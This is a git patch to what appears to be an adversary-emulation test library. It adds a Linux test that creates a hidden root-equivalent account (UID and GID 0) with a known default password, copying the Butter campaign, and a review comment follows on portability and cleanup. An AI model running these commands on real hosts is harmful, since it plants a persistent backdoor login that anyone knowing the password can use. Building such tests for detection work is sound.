From 4212ca043ef1c06ada1bb68a8003be63ae0b49ab Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Tue, 5 Feb 2019 14:04:27 -0700 Subject: [PATCH] T1136 - useradd Linux test to replicate backdoor account from Butter (#444) * initial commit * modified output style * final url changes * Update rocke-and-roll-stage-01.sh * T1136 - Added useradd Linux test to replicate Butter attacks pattern
--- atomics/T1136/T1136.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+)
diff --git a/atomics/T1136/T1136.yaml b/atomics/T1136/T1136.yaml
index 2fb50841..b6698c0b 100644
--- a/atomics/T1136/T1136.yaml
+++ b/atomics/T1136/T1136.yaml
@@ -77,3 +77,23 @@ atomic_tests: New-LocalUser -Name #{username} -NoPassword net user /add #{username}
+
+- name: Create a new user in Linux with `root` UID and GID.
+ description: |
+ Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
+ supported_platforms:
+ - linux
+ input_arguments:
+ username:
+ description: Username of the user to create
+ type: String
+ default: butter
+ password:
+ description: Password of the user to create
+ type: String
+ default: BetterWithButter
+ executor:
+ name: bash
+ command: |
+ useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
+ echo "#{password}" | passwd --stdin #{username}
\ No newline at end of file
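Review bot: `passwd --stdin` on the last added command line is a Red Hat/Fedora-specific option; on Debian, Ubuntu and most other distributions `passwd` rejects it, so the UID 0 account is created but never receives a password and the test silently stops short of the Butter pattern it claims to replicate. The portable form is `echo "#{username}:#{password}" | chpasswd`. Both `useradd -o -u 0 -g 0` and the password step only work as root, and once run the test leaves a second UID 0 login on the host, so it should be paired with a removal step such as `userdel -f #{username}` and should state that elevation is required, if the test schema has fields for those (neither is visible in this hunk). Note also that the password is passed through `echo` and so briefly appears in the process list, which is acceptable for a test but worth a one-line comment in the description.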